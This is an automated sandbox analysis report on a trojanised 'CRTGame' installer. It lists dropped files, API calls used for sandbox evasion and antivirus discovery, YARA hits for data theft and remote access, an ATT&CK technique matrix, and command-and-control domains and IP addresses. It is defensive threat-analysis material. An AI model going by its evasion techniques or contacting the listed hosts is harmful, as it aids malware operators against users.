                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-NG6SA.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libwebp.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\basswv.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\swresample-4.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\is-K8VM1.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\dstt.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-V4GP3.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bass_aac.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-HS78I.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-UMM6D.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\uninstall\unins000.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libFLAC_dynamic.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\basscd.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassalac.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-KPUSQ.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bass.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\peak_scanner_plugin_c.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\OptimFROG.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-Q3IBG.tmp\_isetup\_isdecmp.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\wavpackdll.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-RNIE1.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\tak_deco_lib.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libdtsdec.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-HAM7K.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\raw_decode_plugin_c.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-BJBAO.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\da.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libwinpthread-1.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-V8IE4.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bass_tta.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\gain_analysis.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassopus.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-S02KC.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-RPUOD.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-65BJ1.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\sqlite3.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\plugins\internal\is-Q2C64.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\mp3gain.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\opusenc.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\pcm2dsd.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassmix.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\ff_helper.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\utils.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-PIVQ2.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\libvorbis.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\bassape.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-KCF1P.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-NH7NT.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-Q3IBG.tmp\_isetup\_setup64.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmpDropped PE file which has not been started: C:\Program Files (x86)\CRTGame\bin\x86\is-58TJN.tmpJump to dropped file
                  Source: C:\Users\user\Desktop\6hvZpn91O8.exe | Evasive API call chain: GetSystemTime,DecisionNodes (graph_0-5688)
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe TID: 2308 | Thread sleep count: 267 > 30
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe TID: 2308 | Thread sleep time: -534000s >= -30000s
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe TID: 1432 | Thread sleep count: 41 > 30
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe TID: 1432 | Thread sleep time: -2460000s >= -30000s
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe TID: 2308 | Thread sleep count: 9637 > 30
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe TID: 2308 | Thread sleep time: -19274000s >= -30000s
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe | File opened: PhysicalDrive0
                  Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                  Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_004520C0 FindFirstFileA,GetLastError
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_00473F08 FindFirstFileA,FindNextFileA,FindClose
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_00496568 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_00463404 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_00463880 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_00461E78 FindFirstFileA,FindNextFileA,FindClose
                  Source: C:\Users\user\Desktop\6hvZpn91O8.exe | Code function: 0_2_00409B30 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Thread delayed: delay time: 60000
                  Source: crtgame.exe, 00000006.00000002.2938924611.0000000000807000.00000004.00000020.00020000.00000000.sdmp, crtgame.exe, 00000006.00000002.2938924611.0000000000883000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                  Source: C:\Users\user\Desktop\6hvZpn91O8.exe | API call chain: ExitProcess graph end node (graph_0-6728)
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe | API call chain: ExitProcess graph end node (graph_4-2159)
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe | API call chain: ExitProcess graph end node (graph_4-2399)
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Code function: 6_2_02C3FBBE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_0044C030 LoadLibraryA,GetProcAddress,GetProcAddress
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Code function: 6_2_02C25F14 RtlInitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetTickCount,GetVersionExA,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_malloc,_malloc,_malloc,QueryPerformanceCounter,Sleep,_malloc,_malloc,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,GetTickCount,wsprintfA,InternetOpenA,InternetSetOptionA,InternetSetOptionA,InternetSetOptionA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_strtok,_swscanf,_strtok,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,_sprintf,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Code function: 6_2_02C38F28 SetUnhandledExceptionFilter,UnhandledExceptionFilter
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_00476FAC ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle
                  Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 helpmsg 10
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_0042DFC4 AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Code function: 6_2_02C37A6D cpuid
                  Source: C:\Users\user\Desktop\6hvZpn91O8.exe | Code function: 0_2_004051FC GetLocaleInfoA
                  Source: C:\Users\user\Desktop\6hvZpn91O8.exe | Code function: 0_2_00405248 GetLocaleInfoA
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_00408570 GetLocaleInfoA
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_004085BC GetLocaleInfoA
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_00457CE8 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle
                  Source: C:\Users\user\Desktop\6hvZpn91O8.exe | Code function: 0_2_004026C4 GetSystemTime
                  Source: C:\Users\user\AppData\Local\Temp\is-M9K2G.tmp\6hvZpn91O8.tmp | Code function: 1_2_00454AB8 GetUserNameA
                  Source: C:\Users\user\Desktop\6hvZpn91O8.exe | Code function: 0_2_00405CE4 GetVersionExA
                  Source: C:\Windows\SysWOW64\schtasks.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                  Source: C:\Windows\SysWOW64\schtasks.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

                  Stealing of Sensitive Information

                  Source: Yara match | File source: C:\Program Files (x86)\CRTGame\bin\x86\is-KCF1P.tmp, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\CRTGame\bin\x86\is-HASL7.tmp, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\CRTGame\bin\x86\is-5IVSF.tmp, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\CRTGame\bin\x86\is-UT0J0.tmp, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\CRTGame\bin\x86\is-FJ939.tmp, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\CRTGame\bin\x86\is-IG6J1.tmp, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\CRTGame\bin\x86\is-ONP9R.tmp, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\CRTGame\bin\x86\is-BDC3N.tmp, type: DROPPED
                  Source: Yara match | File source: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000006.00000002.2939732261.0000000002B7F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: crtgame.exe PID: 2496, type: MEMORYSTR

                  Remote Access Functionality

                  Source: Yara match | File source: C:\Program Files (x86)\CRTGame\bin\x86\is-KCF1P.tmp, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\CRTGame\bin\x86\is-HASL7.tmp, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\CRTGame\bin\x86\is-5IVSF.tmp, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\CRTGame\bin\x86\is-UT0J0.tmp, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\CRTGame\bin\x86\is-FJ939.tmp, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\CRTGame\bin\x86\is-IG6J1.tmp, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\CRTGame\bin\x86\is-ONP9R.tmp, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\CRTGame\bin\x86\is-BDC3N.tmp, type: DROPPED
                  Source: Yara match | File source: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000006.00000002.2939732261.0000000002B7F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: crtgame.exe PID: 2496, type: MEMORYSTR
                  | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
                  | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
                  | Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 1 Deobfuscate/Decode Files or Information | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
                  | Credentials | Domains | Default Accounts | 2 Native API | 4 Windows Service | 1 DLL Side-Loading | 3 Obfuscated Files or Information | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
                  | Email Addresses | DNS Server | Domain Accounts | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 1 Access Token Manipulation | 23 Software Packing | Security Account Manager | 1 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact |
                  | Employee Names | Virtual Private Server | Local Accounts | 2 Service Execution | 1 Bootkit | 4 Windows Service | 1 DLL Side-Loading | NTDS | 35 System Information Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
                  | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 12 Process Injection | 1 Masquerading | LSA Secrets | 51 Security Software Discovery | SSH | Keylogging | 112 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
                  | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 1 Scheduled Task/Job | 21 Virtualization/Sandbox Evasion | Cached Domain Credentials | 21 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
                  | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Access Token Manipulation | DCSync | 11 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
                  | Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 12 Process Injection | Proc Filesystem | 3 System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
                  | Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Bootkit | /etc/passwd and /etc/shadow | 1 Remote System Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
                  | IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Dynamic API Resolution | Network Sniffing | 1 System Network Configuration Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement |
                  Behavior Graph ID: 1575009; Sample: 6hvZpn91O8.exe; Start date: 14/12/2024; Architecture: WINDOWS; Score: 100
                  Top-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Antivirus / Scanner detection for submitted sample; 9 other signatures
                  Process tree:
                  • 6hvZpn91O8.exe (started)
                    • dropped: C:\Users\user\AppData\...\6hvZpn91O8.tmp, PE32
                    • 6hvZpn91O8.tmp (started)
                      • dropped: C:\Program Files (x86)\CRTGame\crtgame.exe, PE32; C:\Program Files (x86)\...\is-KCF1P.tmp, PE32; C:\Program Files (x86)\...\is-5IVSF.tmp, PE32; 106 other files (none is malicious)
                      • signature: Uses schtasks.exe or at.exe to add and modify task schedules
                      • crtgame.exe (started)
                        • DNS/IP: bwiesit.com 94.232.249.187, 49736, 49737, 49740, INT-PDN-STE-ASSTEPDNInternalASSY, Syrian Arab Republic
                        • DNS/IP: 46.8.225.74, 2023, 49915, FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics, Russian Federation
                      • schtasks.exe (started)
                        • conhost.exe (started)
                        • conhost.exe (started)
                      • net.exe (started)
                        • conhost.exe (started)
                        • net1.exe (started)
                      • crtgame.exe (started)
                        • dropped: C:\ProgramData\SpaceXRaces\SpaceXRaces.exe, PE32

                  | Source | Detection | Scanner | Label | Link |
                  | --- | --- | --- | --- | --- |
                  | 6hvZpn91O8.exe | 58% | Virustotal | | Browse |
                  | 6hvZpn91O8.exe | 39% | ReversingLabs | Win32.Trojan.Munp | |
                  | 6hvZpn91O8.exe | 100% | Avira | HEUR/AGEN.1332570 | |
Source | Detection | Scanner
C:\Program Files (x86)\CRTGame\bin\x86\7z.exe (copy) | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\OptimFROG.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\avfilter-9.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\avutil-58.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\bass.dll (copy) | 3% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\bass_aac.dll (copy) | 3% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\bass_fx.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\bass_ofr.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\bass_tta.dll (copy) | 3% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\bassalac.dll (copy) | 3% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\bassape.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\basscd.dll (copy) | 3% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\bassdsd.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\bassflac.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\bassmidi.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\bassmix.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\bassopus.dll (copy) | 3% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\basswma.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\basswv.dll (copy) | 3% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\d_writer.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\da.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\daiso.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\dsd2.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\dsd2pcmt.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\dstt.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\ff_helper.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\gain_analysis.dll (copy) | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-12J2O.tmp | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-2CG7G.tmp | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-2CGLR.tmp | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-2JPEP.tmp | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-4NPOS.tmp | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-58TJN.tmp | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-5IVSF.tmp | 3% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-640V1.tmp | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-65BJ1.tmp | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-6RB4E.tmp | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-73F5N.tmp | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-766CT.tmp | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-7Q436.tmp | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-849ND.tmp | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-AGPIJ.tmp | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-BDC3N.tmp | 3% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-BJBAO.tmp | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-C1CHO.tmp | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-C6CS8.tmp | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-DQCHN.tmp | 0% | ReversingLabs
C:\Program Files (x86)\CRTGame\bin\x86\is-F44SJ.tmp | 0% | ReversingLabs
